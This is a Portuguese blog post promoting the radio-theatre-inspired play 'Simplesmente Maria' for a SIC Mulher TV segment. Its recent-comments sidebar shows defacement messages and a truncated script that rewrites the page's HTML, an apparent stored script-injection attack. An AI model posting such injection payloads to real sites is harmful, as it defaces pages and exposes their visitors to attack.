oqueaconteceporai @ 00:04

Qui, 07/02/13

Simplesmente Maria é um espectáculo criado a partir do universo radiofónico dos anos 70 e inspirado nos folhetins de rádio-teatro. Conta a história de Maria, rapariga da província que leva uma vida feita de amor, luta, desgosto e de grandes conquistas.

 

Cruzando esta trama radiofónica com o quotidiano da época, através das histórias ficcionadas dos atores que a interpretam. São, por isso, frequentes as referências a este género teatral e as suas técnicas, nomeadamente as de sonoplastia que são executadas ao vivo e ao período que antecedeu o 25 de Abril. Com este espectáculo devolve-se à memória colectiva um momento que transportará o espectador para um Portugal não muito distante, transformando espectadores de teatro em ouvintes e ouvintes em espectadores de teatro.

 

Simplesmente Maria, não representa o folhetim de sucesso da altura, mas é antes uma viagem ao tempo do teatro radiofónico, do ié-ié, das vozes, da Lambretta, do Parque Mayer, das tertúlias, do Ultramar, e de um Portugal que, vivendo amarrado a uma ditadura, encontrava forma de continuar a respirar até se libertar.

 

Uma história a não perder no Mais Mulher desta quinta-feira, às 17:30, na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO